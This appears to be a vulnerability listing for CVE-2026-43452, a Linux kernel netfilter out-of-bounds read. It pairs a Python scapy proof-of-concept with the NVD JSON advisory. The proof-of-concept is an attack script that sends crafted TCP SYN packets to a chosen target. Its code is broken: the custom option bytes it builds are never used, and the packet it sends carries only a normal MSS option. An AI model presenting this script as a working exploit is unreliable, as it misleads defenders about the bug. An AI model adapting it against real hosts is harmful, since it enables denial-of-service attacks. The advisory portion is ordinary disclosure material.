CVE-2026-43452

#!/usr/bin/env python3 # PoC for CVE-2026-43452: Linux Kernel netfilter OOB Read # This script demonstrates how to craft a packet that may trigger the vulnerability. # It requires scapy to be installed. from scapy.all import * import sys def send_poc(target_ip, target_port): # Construct a TCP SYN packet # The vulnerability is triggered when the last byte of the options is > 1 # and the walker tries to read the length byte (op[i+1]) which is out of bounds. # Standard options padding is usually NOP (1) or EOL (0). We need a byte > 1 at the boundary. # Note: Successfully triggering this depends on the stack processing order. # Craft raw options: filling the 40-byte option space mostly with NOPs, # but putting a specific byte at the end. # This is a simplified representation. custom_options = b"\x02\x04\x05\xB4" # MSS custom_options += b"\x01" * 36 # Padding # Modify the last byte (index 39) to be a kind that expects a length (e.g., 0xFF) # However, Scapy handles padding automatically. We leverage the raw layer or specific option manipulation. ip = IP(dst=target_ip) tcp = TCP(sport=RandShort(), dport=target_port, flags="S", options=[('MSS', 1460)]) # To strictly hit the boundary, one might need to manipulate the packet buffer directly # which is complex in high-level libs. This demonstrates the intent. print(f"[*] Sending PoC packet to {target_ip}:{target_port}") send(ip/tcp, verbose=0) print("[+] Packet sent.") if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <target_ip> <target_port>") sys.exit(1) send_poc(sys.argv[1], int(sys.argv[2]))

{"cve": {"id": "CVE-2026-43452", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:57.900", "lastModified": "2026-05-11T08:16:14.683", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: x_tables: guard option walkers against 1-byte tail reads\n\nWhen the last byte of options is a non-single-byte option kind, walkers\nthat advance with i += op[i + 1] ? : 1 can read op[i + 1] past the end\nof the option area.\n\nAdd an explicit i == optlen - 1 check before dereferencing op[i + 1]\nin xt_tcpudp and xt_dccp option walkers."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "references": [{"url": "https://git.kernel.org/stable/c/5b18b8b35c7cded2d17b2b2604c9b0694ff48d1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9b94f0e42ed248eb31929da84ed9f5310d7ff540", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ae1e1267650638136b84c23f2b31250f0ccb6823", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bc18551c6169eac5ed813778d3e3e484002dbbe5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c2a445367a496a3c25dbc940c10c8bd1cfd4c14a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c39f84e4be1be63fc60ca7141ea7b76edcea5907", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cfe770220ac2dbd3e104c6b45094037455da81d4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d04800323336eebf441d153f43234eac9b833d36", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}